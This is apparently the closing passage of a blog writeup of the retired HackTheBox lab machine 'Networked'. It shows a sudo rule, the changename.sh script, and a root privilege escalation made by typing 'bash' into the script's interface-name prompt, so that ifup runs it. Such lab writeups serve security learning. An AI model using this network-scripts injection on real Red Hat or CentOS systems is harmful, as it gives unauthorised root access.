<span class=\"token assign-left variable\">env_keep</span><span class=\"token operator\">+=</span><span class=\"token string\">\"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\"</span>,\n    <span class=\"token assign-left variable\">env_keep</span><span class=\"token operator\">+=</span><span class=\"token string\">\"LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\"</span>,\n    <span class=\"token assign-left variable\">secure_path</span><span class=\"token operator\">=</span>/sbin<span class=\"token punctuation\">\\</span>:/bin<span class=\"token punctuation\">\\</span>:/usr/sbin<span class=\"token punctuation\">\\</span>:/usr/bin\n\nUser guly may run the following commands on networked:\n    <span class=\"token punctuation\">(</span>root<span class=\"token punctuation\">)</span> NOPASSWD: /usr/local/sbin/changename.sh</code></pre></div>\n<p>Looking at its contents, it appears to be a script that creates the network script <code class=\"language-text\">ifcfg-guly</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># changename.sh</span>\n<span class=\"token comment\">#!/bin/bash -p</span>\n<span class=\"token function\">cat</span> <span class=\"token operator\">></span> /etc/sysconfig/network-scripts/ifcfg-guly <span class=\"token operator\">&lt;&lt;</span> <span class=\"token string\">EoF\nDEVICE=guly0\nONBOOT=no\nNM_CONTROLLED=no\nEoF</span>\n\n<span class=\"token assign-left variable\">regexp</span><span class=\"token operator\">=</span><span class=\"token string\">\"^[a-zA-Z0-9_\\ /-]+$\"</span>\n\n<span class=\"token keyword\">for</span> <span class=\"token for-or-select variable\">var</span> <span class=\"token keyword\">in</span> NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO<span class=\"token punctuation\">;</span> <span class=\"token keyword\">do</span>\n        <span class=\"token builtin class-name\">echo</span> <span class=\"token 
string\">\"interface <span class=\"token variable\">$var</span>:\"</span>\n        <span class=\"token builtin class-name\">read</span> x\n        <span class=\"token keyword\">while</span> <span class=\"token punctuation\">[</span><span class=\"token punctuation\">[</span> <span class=\"token operator\">!</span> <span class=\"token variable\">$x</span> <span class=\"token operator\">=~</span> <span class=\"token variable\">$regexp</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span> <span class=\"token keyword\">do</span>\n                <span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"wrong input, try again\"</span>\n                <span class=\"token builtin class-name\">echo</span> <span class=\"token string\">\"interface <span class=\"token variable\">$var</span>:\"</span>\n                <span class=\"token builtin class-name\">read</span> x\n        <span class=\"token keyword\">done</span>\n        <span class=\"token builtin class-name\">echo</span> <span class=\"token variable\">$var</span><span class=\"token operator\">=</span><span class=\"token variable\">$x</span> <span class=\"token operator\">>></span> /etc/sysconfig/network-scripts/ifcfg-guly\n<span class=\"token keyword\">done</span>\n/sbin/ifup guly0</code></pre></div>\n<p>Since network scripts can have commands embedded directly, embedding <code class=\"language-text\">bash</code> or similar will launch a shell with root privileges, allowing me to obtain the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token punctuation\">[</span>guly@networked .ssh<span class=\"token punctuation\">]</span>$ <span class=\"token function\">sudo</span> /usr/local/sbin/changename.sh\n<span class=\"token function\">sudo</span> /usr/local/sbin/changename.sh\ninterface NAME:\n<span class=\"token 
function\">bash</span>\n///\n<span class=\"token punctuation\">[</span>root@networked network-scripts<span class=\"token punctuation\">]</span><span class=\"token comment\"># cd /root</span></code></pre></div>\n<p>Reference: <a href=\"https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&#x26;qid=e026a0c5f83df4fd532442e1324ffa4f\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Redhat/CentOS root through network-scripts - Exploit</a></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>I finally got back to solving machines after a while.</p>\n<p>I plan to keep going at a steady pace.</p>","fields":{"slug":"/hackthebox-linux-networked-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-05-25","description":"A writeup of the retired HackTheBox machine 'Networked'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Networked (Easy/Linux)","socialImage":{"publicURL":"/static/9ee14b399a3899c36af904fbeee16cdb/hackthebox-linux-networked.png"}}}},"pageContext":{"slug":"/hackthebox-linux-networked-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}